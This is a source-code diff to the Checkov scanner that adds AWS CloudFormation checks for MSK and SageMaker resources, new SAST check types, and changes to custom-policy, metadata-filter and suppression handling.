--- a/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py
+++ b/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py
@@ -9,8 +9,15 @@ def __init__(self):
         super().__init__(name=name, id=id)
 
     def cloudsplaining_analysis(self, policy):
-        escalation = policy.allows_privilege_escalation
-        return escalation
+        escalations = policy.allows_privilege_escalation
+        flattened_escalations: list[str] = []
+        if escalations:
+            for escalation in escalations:
+                if isinstance(escalation, dict):
+                    flattened_escalations.extend(escalation.get('actions'))
+                else:
+                    flattened_escalations.append(escalation)
+        return flattened_escalations
 
 
 check = cloudsplainingPrivilegeEscalation()
diff --git a/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py b/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py
index 78d38557da4..4d2ab01cab9 100644
--- a/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py
+++ b/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py
@@ -27,7 +27,6 @@ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
                         else:
                             return CheckResult.FAILED
                 except IndexError:
-                    print("Not a service principal")
                     # Not a service principal, so pass.
                     return CheckResult.UNKNOWN
         return CheckResult.UNKNOWN
diff --git a/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py b/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py
new file mode 100644
index 00000000000..1fd59437077
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py
@@ -0,0 +1,34 @@
+from typing import Any, List
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.cloudformation.checks.resource.base_resource_check import BaseResourceCheck
+
+
+class MSKClusterEncryption(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure MSK Cluster encryption in rest and transit is enabled"
+        id = "CKV_AWS_81"
+        supported_resources = ['AWS::MSK::Cluster']
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf) -> Any:
+        # Note: As long as the 'EncryptionInfo' block is specified, the cluster
+        # will be encrypted at rest even if 'DataVolumeKMSKeyId' is not specified
+        if 'Properties' in conf.keys():
+            if 'EncryptionInfo' in conf['Properties'].keys():
+                encryption = conf['Properties']['EncryptionInfo']
+                if 'EncryptionInTransit' in encryption:
+                    transit = encryption['EncryptionInTransit']
+                    if 'ClientBroker' in transit and transit['ClientBroker'] != 'TLS' or \
+                            'InCluster' in transit and transit['InCluster'] is False:
+                        return CheckResult.FAILED
+                return CheckResult.PASSED
+        return CheckResult.FAILED
+
+    def get_evaluated_keys(self) -> List[str]:
+        return ['Properties/EncryptionInfo/EncryptionInTransit/ClientBroker',
+                'Properties/EncryptionInfo/EncryptionInTransit/InCluster']
+
+
+check = MSKClusterEncryption()
diff --git a/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py b/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py
new file mode 100644
index 00000000000..088115dd12c
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py
@@ -0,0 +1,27 @@
+from typing import Any
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.cloudformation.checks.resource.base_resource_check import BaseResourceCheck
+
+
+class MSKClusterLogging(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure MSK Cluster logging is enabled"
+        id = "CKV_AWS_80"
+        supported_resources = ['AWS::MSK::Cluster']
+        categories = [CheckCategories.LOGGING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf) -> Any:
+        if 'Properties' in conf.keys():
+            if 'LoggingInfo' in conf['Properties'].keys():
+                if 'BrokerLogs' in conf['Properties']['LoggingInfo'].keys():
+                    logging = conf['Properties']['LoggingInfo']['BrokerLogs']
+                    types = ["CloudWatchLogs", "Firehose", "S3"]
+                    for x in types:
+                        if x in logging and 'Enabled' in logging[x] and logging[x]['Enabled'] is True:
+                            return CheckResult.PASSED
+        return CheckResult.FAILED
+
+
+check = MSKClusterLogging()
diff --git a/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py b/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py
new file mode 100644
index 00000000000..3f59908b2de
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py
@@ -0,0 +1,22 @@
+from typing import Any, List
+
+from checkov.cloudformation.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class MSKClusterNodesArePrivate(BaseResourceNegativeValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure MSK nodes are private"
+        id = "CKV_AWS_291"
+        supported_resources = ['AWS::MSK::Cluster']
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return 'Properties/BrokerNodeGroupInfo/ConnectivityInfo/PublicAccess/Type'
+
+    def get_forbidden_values(self) -> List[Any]:
+        return ["SERVICE_PROVIDED_EIPS"]
+
+
+check = MSKClusterNodesArePrivate()
diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py b/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py
new file mode 100644
index 00000000000..c240a7f2251
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py
@@ -0,0 +1,21 @@
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerDataQualityJobDefinitionEncryption(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts"
+        id = "CKV_AWS_367"
+        supported_resources = ["AWS::SageMaker::DataQualityJobDefinition"]
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return 'Properties/DataQualityJobOutputConfig/KmsKeyId'
+
+    def get_expected_value(self):
+        return ANY_VALUE
+
+
+check = SagemakerDataQualityJobDefinitionEncryption()
diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py b/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py
new file mode 100644
index 00000000000..231e1ae0577
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py
@@ -0,0 +1,17 @@
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerDataQualityJobDefinitionTrafficEncryption(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs"
+        id = "CKV_AWS_369"
+        supported_resources = ["AWS::SageMaker::DataQualityJobDefinition"]
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return 'Properties/NetworkConfig/EnableInterContainerTrafficEncryption'
+
+
+check = SagemakerDataQualityJobDefinitionTrafficEncryption()
diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py b/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py
new file mode 100644
index 00000000000..d1873f032c6
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py
@@ -0,0 +1,21 @@
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerDataQualityJobDefinitionVolumeEncryption(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt data on attached storage volume"
+        id = "CKV_AWS_368"
+        supported_resources = ["AWS::SageMaker::DataQualityJobDefinition"]
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return 'Properties/JobResources/ClusterConfig/VolumeKmsKeyId'
+
+    def get_expected_value(self):
+        return ANY_VALUE
+
+
+check = SagemakerDataQualityJobDefinitionVolumeEncryption()
diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerModelWithNetworkIsolation.py b/checkov/cloudformation/checks/resource/aws/SagemakerModelWithNetworkIsolation.py
new file mode 100644
index 00000000000..2bcdafd8be0
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/SagemakerModelWithNetworkIsolation.py
@@ -0,0 +1,17 @@
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerModelWithNetworkIsolation(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Amazon SageMaker model uses network isolation"
+        id = "CKV_AWS_370"
+        supported_resources = ["AWS::SageMaker::Model"]
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return 'Properties/EnableNetworkIsolation'
+
+
+check = SagemakerModelWithNetworkIsolation()
diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py b/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py
new file mode 100644
index 00000000000..daf78957202
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py
@@ -0,0 +1,26 @@
+from typing import List
+
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerNotebookEncryptedWithCMK(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)"
+        id = "CKV_AWS_187"
+        supported_resources = ("AWS::SageMaker::NotebookInstance", "AWS::SageMaker::Domain")
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return 'Properties/KmsKeyId'
+
+    def get_expected_value(self):
+        return ANY_VALUE
+
+    def get_evaluated_keys(self) -> List[str]:
+        return ['Properties/KmsKeyId']
+
+
+check = SagemakerNotebookEncryptedWithCMK()
diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py b/checkov/cloudformation/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py
new file mode 100644
index 00000000000..3dc4904b9b4
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py
@@ -0,0 +1,20 @@
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerNotebookInstanceAllowsIMDSv2(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2"
+        id = "CKV_AWS_371"
+        supported_resources = ["AWS::SageMaker::NotebookInstance"]
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return 'Properties/InstanceMetadataServiceConfiguration/MinimumInstanceMetadataServiceVersion'
+
+    def get_expected_value(self):
+        return "2"
+
+
+check = SagemakerNotebookInstanceAllowsIMDSv2()
diff --git a/checkov/cloudformation/image_referencer/provider/aws.py b/checkov/cloudformation/image_referencer/provider/aws.py
index 0bb9c2cc521..ca2c95121f5 100644
--- a/checkov/cloudformation/image_referencer/provider/aws.py
+++ b/checkov/cloudformation/image_referencer/provider/aws.py
@@ -88,6 +88,33 @@ def extract_images_from_aws_lightsail_container_service_deployment_version(resou
     return image_names
 
 
+def extract_images_from_aws_sagemaker_image_version(resource: dict[str, Any]) -> list[str]:
+    image_names: list[str] = []
+
+    image_name = find_in_dict(input_dict=resource, key_path="BaseImage")
+    if image_name and isinstance(image_name, str):
+        image_names.append(image_name)
+
+    return image_names
+
+
+def extract_images_from_aws_sagemaker_model(resource: dict[str, Any]) -> list[str]:
+    image_names: list[str] = []
+
+    image_name = find_in_dict(input_dict=resource, key_path="PrimaryContainer/Image")
+    if image_name and isinstance(image_name, str):
+        image_names.append(image_name)
+
+    containers = find_in_dict(input_dict=resource, key_path="Containers")
+    if isinstance(containers, list):
+        for container in containers:
+            name = container.get("Image")
+            if name and isinstance(name, str):
+                image_names.append(name)
+
+    return image_names
+
+
 # needs to be at the bottom to add the defined functions
 SUPPORTED_AWS_IMAGE_RESOURCE_TYPES = {
     "AWS::AppRunner::Service": extract_images_from_aws_apprunner_service,
@@ -95,4 +122,6 @@ def extract_images_from_aws_lightsail_container_service_deployment_version(resou
     "AWS::CodeBuild::Project": extract_images_from_aws_codebuild_project,
     "AWS::ECS::TaskDefinition": extract_images_from_aws_ecs_task_definition,
     "AWS::Lightsail::Container": extract_images_from_aws_lightsail_container_service_deployment_version,
+    "AWS::SageMaker::ImageVersion": extract_images_from_aws_sagemaker_image_version,
+    "AWS::SageMaker::Model": extract_images_from_aws_sagemaker_model,
 }
diff --git a/checkov/common/bridgecrew/check_type.py b/checkov/common/bridgecrew/check_type.py
index c37b013c525..26c1da0e331 100644
--- a/checkov/common/bridgecrew/check_type.py
+++ b/checkov/common/bridgecrew/check_type.py
@@ -35,6 +35,8 @@ class CheckType:
     SAST_PYTHON = 'sast_python'
     SAST_JAVA = 'sast_java'
     SAST_JAVASCRIPT = 'sast_javascript'
+    SAST_TYPESCRIPT = 'sast_typescript'
+    SAST_GOLANG = 'sast_golang'
     POLICY_3D = "3d_policy"
 
 
@@ -43,6 +45,8 @@ class SastType:
     SAST_PYTHON = 'sast_python'
     SAST_JAVA = 'sast_java'
     SAST_JAVASCRIPT = 'sast_javascript'
+    SAST_TYPESCRIPT = 'sast_typescript'
+    SAST_GOLANG = 'sast_golang'
 
 
 # needs to be at the end
diff --git a/checkov/common/bridgecrew/code_categories.py b/checkov/common/bridgecrew/code_categories.py
index c6a4caaad46..ad18d0bc363 100644
--- a/checkov/common/bridgecrew/code_categories.py
+++ b/checkov/common/bridgecrew/code_categories.py
@@ -47,6 +47,8 @@ class CodeCategoryType(str, Enum):
     CheckType.SAST_PYTHON: CodeCategoryType.WEAKNESSES,
     CheckType.SAST_JAVA: CodeCategoryType.WEAKNESSES,
     CheckType.SAST_JAVASCRIPT: CodeCategoryType.WEAKNESSES,
+    CheckType.SAST_TYPESCRIPT: CodeCategoryType.WEAKNESSES,
+    CheckType.SAST_GOLANG: CodeCategoryType.WEAKNESSES,
     CheckType.POLICY_3D: CodeCategoryType.IAC
 }
 
diff --git a/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py b/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py
index e0f7a67dcba..269c1eb158d 100644
--- a/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py
+++ b/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py
@@ -4,6 +4,7 @@
 import logging
 import re
 from collections import defaultdict
+import tempfile
 from typing import TYPE_CHECKING, Any, List
 
 from checkov.common.bridgecrew.integration_features.base_integration_feature import BaseIntegrationFeature
@@ -21,6 +22,8 @@
 
 # service-provider::service-name::data-type-name
 CFN_RESOURCE_TYPE_IDENTIFIER = re.compile(r"^[a-zA-Z0-9]+::[a-zA-Z0-9]+::[a-zA-Z0-9]+$")
+SAST_CATEGORY = 'Sast'
+LICENSES_CATEGORY = 'Licenses'
 
 
 class CustomPoliciesIntegration(BaseIntegrationFeature):
@@ -49,9 +52,16 @@ def pre_scan(self) -> None:
                 return
 
             policies = self.bc_integration.customer_run_config_response.get('customPolicies')
+            sast_policies_dir = tempfile.mkdtemp()
+            self.bc_integration.sast_custom_policies = sast_policies_dir
             for policy in policies:
                 try:
                     logging.debug(f"Loading policy id: {policy.get('id')}")
+                    if policy.get('category') == SAST_CATEGORY:
+                        with open(f"{sast_policies_dir}/{policy.get('id')}.yaml", 'a') as f:
+                            f.write(policy.get('code'))
+                        continue
+
                     converted_check = self._convert_raw_check(policy)
                     source_incident_id = policy.get('sourceIncidentId')
                     if source_incident_id:
@@ -59,6 +69,10 @@ def pre_scan(self) -> None:
                         self.bc_cloned_checks[source_incident_id].append(policy)
                         continue
                     resource_types = Registry._get_resource_types(converted_check['metadata'])
+
+                    if policy.get('category') == LICENSES_CATEGORY:
+                        continue
+
                     check = self.platform_policy_parser.parse_raw_check(converted_check, resources_types=resource_types)
                     check.severity = Severities[policy['severity']]
                     check.bc_id = check.id
@@ -70,6 +84,8 @@ def pre_scan(self) -> None:
                                 get_graph_checks_registry("terraform").checks.append(check)
                             elif f.lower() == "kubernetes":
                                 get_graph_checks_registry("kubernetes").checks.append(check)
+                            elif f.lower() == "bicep":
+                                get_graph_checks_registry("bicep").checks.append(check)
                     elif re.match(CFN_RESOURCE_TYPE_IDENTIFIER, check.resource_types[0]):
                         get_graph_checks_registry("cloudformation").checks.append(check)
                     else:
@@ -87,7 +103,8 @@ def _convert_raw_check(policy: dict[str, Any]) -> dict[str, Any]:
             'id': policy['id'],
             'name': policy['title'],
             'category': policy['category'],
-            'frameworks': policy.get('frameworks', [])
+            'frameworks': policy.get('frameworks', []),
+            'scope': {'provider': policy.get('provider', '').lower()}
         }
         check = {
             'metadata': metadata,
diff --git a/checkov/common/bridgecrew/integration_features/features/fixes_integration.py b/checkov/common/bridgecrew/integration_features/features/fixes_integration.py
index 951688d89a7..4baeda0ae40 100644
--- a/checkov/common/bridgecrew/integration_features/features/fixes_integration.py
+++ b/checkov/common/bridgecrew/integration_features/features/fixes_integration.py
@@ -111,7 +111,8 @@ def _get_fixes_for_file(
 
         headers = merge_dicts(
             get_default_post_headers(self.bc_integration.bc_source, self.bc_integration.bc_source_version),
-            {"Authorization": self.bc_integration.get_auth_token()}
+            {"Authorization": self.bc_integration.get_auth_token()},
+            self.bc_integration.custom_auth_headers
         )
 
         if not self.bc_integration.http:
diff --git a/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py b/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py
index e0fe5a537eb..dc3bbbc594c 100644
--- a/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py
+++ b/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py
@@ -22,11 +22,13 @@ class PolicyMetadataIntegration(BaseIntegrationFeature):
     def __init__(self, bc_integration: BcPlatformIntegration) -> None:
         super().__init__(bc_integration=bc_integration, order=0)
         self.check_metadata: dict[str, Any] = {}
+        self.sast_check_metadata: dict[str, Any] = {}
         self.bc_to_ckv_id_mapping: dict[str, str] = {}
         self.pc_to_ckv_id_mapping: dict[str, str] = {}
         self.ckv_id_to_source_incident_id_mapping: dict[str, str] = {}
         self.severity_key = 'severity'
         self.filtered_policy_ids: list[str] = []
+        self.filtered_exception_policy_ids: list[str] = []
 
     def is_valid(self) -> bool:
         return (
@@ -39,7 +41,10 @@ def pre_scan(self) -> None:
             if self.bc_integration.customer_run_config_response:
                 self._handle_customer_run_config(self.bc_integration.customer_run_config_response)
                 if self.bc_integration.is_prisma_integration():
-                    self._handle_customer_prisma_policy_metadata(self.bc_integration.prisma_policies_response)
+                    # build a list of policy ids included using the --prisma-metadata-filter flag
+                    self._handle_customer_prisma_policy_metadata(self.bc_integration.prisma_policies_response, exclude_policies=False)
+                    # build a list of policy ids excluded using the --prisma-metadata-filter-exception flag
+                    self._handle_customer_prisma_policy_metadata(self.bc_integration.prisma_policies_exception_response, exclude_policies=True)
             elif self.bc_integration.public_metadata_response:
                 self._handle_public_metadata(self.bc_integration.public_metadata_response)
             else:
@@ -141,16 +146,19 @@ def _handle_public_metadata(self, check_metadata: dict[str, Any]) -> None:
     def _handle_customer_run_config(self, run_config: dict[str, Any]) -> None:
         self.check_metadata = run_config['policyMetadata']
         for ckv_id, pol in self.check_metadata.items():
+            if 'SAST' in ckv_id:
+                self.sast_check_metadata[ckv_id] = pol
             self.bc_to_ckv_id_mapping[pol['id']] = ckv_id
             if self.bc_integration.is_prisma_integration() and pol.get('pcPolicyId'):
                 self.pc_to_ckv_id_mapping[pol['pcPolicyId']] = ckv_id
         # Custom policies are returned in run_config['customPolicies'] rather than run_config['policyMetadata'].
         if 'customPolicies' in run_config:
             for custom_policy in run_config['customPolicies']:
-                if 'guideline' in custom_policy:
-                    self.check_metadata[custom_policy['id']] = {
-                        'guideline': custom_policy['guideline']
-                    }
+                custom_policy_check_metadata = {
+                    'severity': custom_policy.get('severity'),
+                    'guideline': custom_policy.get('guideline')
+                }
+                self.check_metadata[custom_policy['id']] = {k: v for k, v in custom_policy_check_metadata.items() if v is not None}
                 pc_policy_id = custom_policy.get('pcPolicyId')
                 if pc_policy_id:
                     self.pc_to_ckv_id_mapping[pc_policy_id] = custom_policy['id']
@@ -158,7 +166,8 @@ def _handle_customer_run_config(self, run_config: dict[str, Any]) -> None:
                 if source_incident_id:
                     self.ckv_id_to_source_incident_id_mapping[custom_policy['id']] = source_incident_id
 
-    def _handle_customer_prisma_policy_metadata(self, prisma_policy_metadata: list[dict[str, Any]]) -> None:
+    def _handle_customer_prisma_policy_metadata(self, prisma_policy_metadata: list[dict[str, Any]], exclude_policies: bool) -> None:
+        policy_ids = list()
         if isinstance(prisma_policy_metadata, list):
             for metadata in prisma_policy_metadata:
                 logging.debug(f"Parsing filtered_policy_ids from metadata: {json.dumps(metadata)}")
@@ -166,12 +175,18 @@ def _handle_customer_prisma_policy_metadata(self, prisma_policy_metadata: list[d
                 if pc_id:
                     ckv_id = self.get_ckv_id_from_pc_id(pc_id)
                     if ckv_id:
-                        self.filtered_policy_ids.append(ckv_id)
-            self._add_ckv_id_for_filtered_cloned_checks()
+                        policy_ids.append(ckv_id)
+            if exclude_policies:
+                self.filtered_exception_policy_ids = policy_ids
+                self._add_ckv_id_for_filtered_cloned_checks(self.filtered_exception_policy_ids, exclude_policies)
+            else:
+                self.filtered_policy_ids = policy_ids
+                self._add_ckv_id_for_filtered_cloned_checks(self.filtered_policy_ids, exclude_policies)
 
-    def _add_ckv_id_for_filtered_cloned_checks(self) -> None:
+    def _add_ckv_id_for_filtered_cloned_checks(self, policy_ids: list[str], exclude_policies: bool) -> None:
         """
         Filtered checks are the policies that are returned by --policy-metadata-filter.
+        Filtered exclusion checks are the policies that are returned by --policy-metadata-filter-exclusion.
         Cloned checks are policies that have modified metadata in Prisma (severity, title etc).
         Filtered checks do not have a definition if they are cloned, instead they have a sourceIncidentId
         which corresponds to the BC ID of the original source check.
@@ -179,13 +194,13 @@ def _add_ckv_id_for_filtered_cloned_checks(self) -> None:
         Example:
             Input:
                 filtered_policy_ids = [ "org_AWS_1609123441" ]
-                ckv_id_to_source_incident_id_mapping =  { "org_AWS_1609123441": "BC__AWS_GENERAL_123" }
-                bc_id_to_ckv_id_mapping = { "BC__AWS_GENERAL_123": "CKV_AWS_123" }
+                ckv_id_to_source_incident_id_mapping =  { "org_AWS_1609123441": "BC_AWS_GENERAL_123" }
+                bc_id_to_ckv_id_mapping = { "BC_AWS_GENERAL_123": "CKV_AWS_123" }
             Output:
                 filtered_policy_ids = [ "org_AWS_1609123441", "CKV_AWS_123" ]
         """
         ckv_ids = []
-        for policy_id in self.filtered_policy_ids:
+        for policy_id in policy_ids:
             source_bc_id = self.get_source_incident_id_from_ckv_id(policy_id)
             if not source_bc_id:
                 continue
@@ -193,6 +208,9 @@ def _add_ckv_id_for_filtered_cloned_checks(self) -> None:
             if not ckv_id:
                 continue
             ckv_ids.append(ckv_id)
+        if exclude_policies:
+            self.filtered_exception_policy_ids += ckv_ids
+            return
         self.filtered_policy_ids += ckv_ids
 
     def pre_runner(self, runner: _BaseRunner) -> None:
diff --git a/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py b/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py
index 95642b69c33..6dc27691763 100644
--- a/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py
+++ b/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py
@@ -1,9 +1,10 @@
 from __future__ import annotations
 
+import itertools
 import logging
 import re
 from itertools import groupby
-from typing import TYPE_CHECKING, Pattern, Any
+from typing import TYPE_CHECKING, Pattern, Any, Optional
 
 from checkov.common.bridgecrew.check_type import CheckType
 
@@ -14,6 +15,7 @@
 from checkov.common.models.enums import CheckResult
 from checkov.common.output.record import SCA_PACKAGE_SCAN_CHECK_NAME
 from checkov.common.util.file_utils import convert_to_unix_path
+from checkov.common.util.str_utils import removeprefix, align_path
 
 if TYPE_CHECKING:
     from checkov.common.bridgecrew.platform_integration import BcPlatformIntegration
@@ -25,6 +27,7 @@
 class SuppressionsIntegration(BaseIntegrationFeature):
     def __init__(self, bc_integration: BcPlatformIntegration) -> None:
         super().__init__(bc_integration=bc_integration, order=2)  # must be after the custom policies integration
+        self.suppressions_v2: dict[str, list[dict[str, Any]]] = {}
         self.suppressions: dict[str, list[dict[str, Any]]] = {}
 
         # bcorgname_provider_timestamp (ex: companyxyz_aws_1234567891011)
@@ -51,26 +54,56 @@ def pre_scan(self) -> None:
                 return
 
             suppressions = self.bc_integration.customer_run_config_response.get('suppressions')
+            suppressions_v2 = self.bc_integration.customer_run_config_response.get('suppressionsV2')  # currently just SAST
 
             for suppression in suppressions:
+                suppression['isV1'] = True
                 if suppression['policyId'] in metadata_integration.bc_to_ckv_id_mapping:
                     suppression['checkovPolicyId'] = metadata_integration.get_ckv_id_from_bc_id(suppression['policyId'])
                 else:
                     suppression['checkovPolicyId'] = suppression['policyId']  # custom policy
 
+            for suppression in suppressions_v2:
+                suppression['isV1'] = False
+                checkov_ids = []
+                for policy_id in suppression['policyIds']:
+                    if policy_id in metadata_integration.bc_to_ckv_id_mapping:
+                        checkov_ids.append(metadata_integration.bc_to_ckv_id_mapping[policy_id])
+                    else:
+                        checkov_ids.append(policy_id)  # custom policy - not supported yet
+                suppression['checkovPolicyIds'] = checkov_ids
+
             self._init_repo_regex()
             suppressions = sorted(suppressions, key=lambda s: s['checkovPolicyId'])
 
             # group and map by policy ID
             self.suppressions = {policy_id: list(sup) for policy_id, sup in
                                  groupby(suppressions, key=lambda s: s['checkovPolicyId'])}
-            logging.debug(f'Found {len(self.suppressions)} valid suppressions from the platform.')
-            logging.debug('The found suppression rules are:')
+
+            # map suppressions v2 by checkov ID - because the policy IDs are arrays, we need to map each unique ID in each
+            # suppression's policy ID array to its suppressions
+            self.suppressions_v2 = SuppressionsIntegration.create_suppression_v2_policy_id_map(suppressions_v2)
+
+            logging.debug('The found suppression v1 rules are:')
             logging.debug(self.suppressions)
+            logging.debug('The found suppression v2 rules are:')
+            logging.debug(self.suppressions_v2)
+
         except Exception:
             self.integration_feature_failures = True
             logging.debug("Scanning without applying suppressions configured in the platform.", exc_info=True)
 
+    @staticmethod
+    def create_suppression_v2_policy_id_map(suppressions_v2: list[dict[str, Any]]) -> dict[str, list[dict[str, Any]]]:
+        checkov_id_map: dict[str, list[dict[str, Any]]] = {}
+        for suppression in suppressions_v2:
+            for checkov_id in suppression['checkovPolicyIds']:
+                if checkov_id in checkov_id_map:
+                    checkov_id_map[checkov_id].append(suppression)
+                else:
+                    checkov_id_map[checkov_id] = [suppression]
+        return checkov_id_map
+
     def post_runner(self, scan_report: Report) -> None:
         self._apply_suppressions_to_report(scan_report)
 
@@ -88,16 +121,22 @@ def _apply_suppressions_to_report(self, scan_report: Report) -> None:
                 check.check_id = 'BC_VUL_1'
 
             relevant_suppressions = self.suppressions.get(check.check_id)
+            relevant_suppressions_v2 = self.suppressions_v2.get(check.check_id)
+
+            has_suppression = relevant_suppressions or relevant_suppressions_v2
 
-            applied_suppression = self._check_suppressions(check, relevant_suppressions) if relevant_suppressions else None
+            applied_suppression = self._check_suppressions(check, relevant_suppressions, relevant_suppressions_v2) if has_suppression else None
             if applied_suppression:
-                suppress_comment = applied_suppression['comment']
-                logging.debug(f'Applying suppression to the check {check.check_id} with the comment: {suppress_comment}')
-                check.check_result = {
-                    'result': CheckResult.SKIPPED,
-                    'suppress_comment': suppress_comment
-                }
-                scan_report.skipped_checks.append(check)
+                suppress_comment = applied_suppression['comment'] if applied_suppression['isV1'] else applied_suppression['justificationComment']
+                if self._should_omit_check(applied_suppression):
+                    logging.debug(f'Removing check {check.check_id} from the report, comment: {suppress_comment}')
+                else:
+                    logging.debug(f'Applying suppression to the check {check.check_id} with the comment: {suppress_comment}')
+                    check.check_result = {
+                        'result': CheckResult.SKIPPED,
+                        'suppress_comment': suppress_comment
+                    }
+                    scan_report.skipped_checks.append(check)
             elif check.check_result['result'] == CheckResult.FAILED:
                 still_failed_checks.append(check)
             else:
@@ -106,17 +145,27 @@ def _apply_suppressions_to_report(self, scan_report: Report) -> None:
         scan_report.failed_checks = still_failed_checks
         scan_report.passed_checks = still_passed_checks
 
-    def _check_suppressions(self, record: Record, suppressions: list[dict[str, Any]]) -> dict[str, Any] | None:
+    @staticmethod
+    def _should_omit_check(applied_suppression: dict[str, Any]) -> bool:
+        if applied_suppression['isV1']:
+            return False
+        if applied_suppression['ruleType'] == 'policy':
+            return True
+        return False
+
